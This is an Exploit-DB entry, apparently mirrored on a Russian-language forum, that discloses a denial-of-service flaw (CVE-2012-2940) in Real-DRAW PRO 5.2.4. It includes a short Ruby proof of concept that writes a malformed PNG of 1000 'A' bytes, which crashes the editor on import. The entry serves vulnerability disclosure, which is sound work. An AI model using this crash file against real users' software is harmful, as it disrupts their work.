- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 18902
- Проверка EDB
-
- Пройдено
- Автор
- AHMED ELHADY MOHAMED
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2012-2940
- Дата публикации
- 2012-05-21
Код:
Real-DRAW PRO 5.2.4 Import File Crash
===================================================================================
# Exploit Title:Real-DRAW PRO 5.2.4 Malicious PNG File Denial of service
# Vendor : http://www.mediachance.com/
# Author: Ahmed Elhady Mohamed
# Email : [email protected]
# Website: www.infosec4all.tk
# version: 5.2.4
# Category: DOS
# Tested on: windows XP SP3
===================================================================================
########################################DESC#############################################
#Real-Draw seamlessly combines vector tools with the rich look of pixel based images and#
#innovative natural paint techniques into a single graphics editor. #
#########################################################################################
########################################################################################
#Real-DRAW PRO 5.2.4 crashes while importing a crafted PNG, WMF, PSD, TGA, TTF, BMP, #
#TIFF and PCX file #
#To trigger the exploit , go to file->Import #
########################################################################################
#!/usr/bin/ruby
File.open "Crash.png" , "w" do |file|
junk = "A" *1000
file.write junk
end
- Источник
- www.exploit-db.com